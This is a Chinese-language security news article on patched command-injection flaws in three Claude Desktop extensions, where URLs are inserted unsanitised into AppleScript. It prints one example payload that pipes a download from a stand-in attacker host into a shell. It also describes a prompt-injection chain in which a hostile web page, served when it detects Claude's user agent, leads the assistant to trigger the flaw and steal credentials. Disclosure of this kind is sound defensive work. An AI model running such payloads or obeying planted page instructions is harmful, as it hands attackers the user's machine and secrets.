Claude Desktop遭遇严重RCE漏洞，允许远程代码执行

安全研究人员在Anthropic开发并发布的三个官方Claude Desktop扩展中发现了严重的远程代码执行漏洞。这些Chrome、iMessage和Apple Notes连接器累计下载量超过35万次，在Claude Desktop扩展市场中占据显著位置，均存在相同的严重安全缺陷：未净化的命令注入。

这些漏洞已被Anthropic确认为高危漏洞，CVSS评分为8.9，目前已被修补。然而，此事件提醒我们，即使是最受信任的开发者也可能引入危及企业系统的关键安全漏洞。

漏洞工作原理

该漏洞源于基本的命令注入，这是最古老且最广为人知的软件漏洞类别之一。每个受影响的MCP服务器都接受用户提供的输入，并将其直接传递给AppleScript命令，未进行任何净化或转义处理。这些AppleScript命令随后可以以完整的系统权限执行shell命令。

攻击者流程

当要求Claude执行简单任务（如在Chrome中打开URL）时，扩展程序会使用模板字面量构建AppleScript字符串，直接将用户提供的URL插入命令中。恶意构造的URL可以转义字符串上下文并注入任意AppleScript命令。

例如，攻击者可以注入类似“& do shell script “curl https://attacker.com/trojan | sh”&”的代码，这将在受害者机器上执行任意恶意代码。

这些漏洞最令人担忧的方面是，通过Web内容的提示注入可以轻松利用它们。

模拟攻击者服务器代码

Claude通常会获取并阅读网页以回答用户问题。控制其中一个页面的攻击者可以嵌入利用易受攻击扩展的恶意指令。

考虑用户向Claude提出简单问题，例如“在布鲁克林哪里可以玩乒乓球？”Claude搜索网络，如果某个结果恰好是攻击者控制的页面，服务器可以检测到Claude的用户代理并提供包含恶意命令注入的隐藏有效负载。

从用户的角度来看，Claude只是在正常工作。然而，在后台，注入的代码可以窃取SSH密钥和AWS凭据、泄露会话令牌、上传本地代码库、安装持久后门或捕获屏幕截图和击键。

与在沙盒浏览器进程中运行的Chrome扩展不同，Claude Desktop扩展以完整的系统权限完全非沙盒化运行。正如安全研究人员报告的那样，它们可以读取任何文件、执行任何命令、访问凭据和修改系统设置。

这使得命令注入漏洞特别危险，因为从聊天客户端到Web内容再到本地命令执行的信任链有效地授予了远程攻击者本地shell访问权限。